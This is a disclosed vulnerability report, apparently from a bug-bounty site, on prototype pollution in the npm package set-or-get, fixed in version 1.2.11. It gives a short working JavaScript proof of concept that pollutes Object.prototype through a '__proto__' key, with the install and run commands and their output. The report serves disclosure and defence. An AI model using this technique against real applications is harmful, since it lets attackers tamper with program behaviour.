Prototype Pollution in ionicabizau/set-or-get.js

Valid

Reported on

Dec 17th 2020


Description

set-or-get is vulnerable to Prototype Pollution.

Proof of Concept

  1. Create the following PoC file:
// poc.js
var SetOrGet = require("set-or-get");
var obj = {}
console.log("Before : " + {}.polluted);
SetOrGet(obj, "__proto__", {}).polluted ='Yes! Its Polluted';
console.log("After : " + {}.polluted);
  1. Execute the following commands in terminal:
npm i set-or-get # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
Before : undefined
After : Yes! Its Polluted
Ionică Bizău (Johnny B.) marked this as fixed in 1.2.11 with commit 82ede5 a year ago
Arjun Shibu has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation